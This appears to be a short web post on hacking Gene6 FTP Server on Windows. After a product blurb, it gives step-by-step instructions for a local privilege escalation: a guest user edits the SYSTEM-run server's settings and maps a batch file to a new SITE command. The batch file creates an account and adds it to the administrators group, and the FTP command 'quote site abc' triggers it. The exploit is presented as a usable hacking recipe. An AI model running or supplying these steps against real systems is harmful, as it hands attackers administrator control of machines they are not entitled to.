Hack Ftp server with Gene6 FTP Local User Privilege Escalation Exploit
Gene6 FTP Server is an advanced FTP server software for Windows developed specifically for security and high performance requirements. Gene6 FTP Server is a professional Windows FTP Server featuring speed, reliability and customization. Its main assets are remote administration, encrypted (SSL 128 bits) connection, and ease of use. Its fast performances allow it to run heavily loaded files servers worldwide but this does not make it out of range of smaller companies who will find in it a customizable, trustable and easy to administer FTP server at an affordable price.
Local exploitation of a design error in Gene6 FTP Server allowes the attacker to gain elevated Privileges,usually the SYSTEM.The problem is that ,after a default installation,a local non-privileged user can modify the settings of the Gene6 FTP Server,which is run under SYSTEM ,such as adding a new "SITE COMMAND".
Exploit
1.Logon as a unprivileged user like a guest.
2.Open the Gene6 FTP Server control console and add a FTP user account,for
example,test.
3.Add a new SITE command for the FTP server,to do this ,you need to map a
executable files to a new SITE command as explained in step 4 and 5
4.Simply write a .bat file named ABC.bat with following lines ;
net user abc /add
net localgroup administrators abc /add
5.Map this ABC.bat to a new SITE command .
6.Use the "test" user logon to the FTP server,and execute the following command:
ftp>quote site abc
User Manual of Gene6 FTP v3
Comments
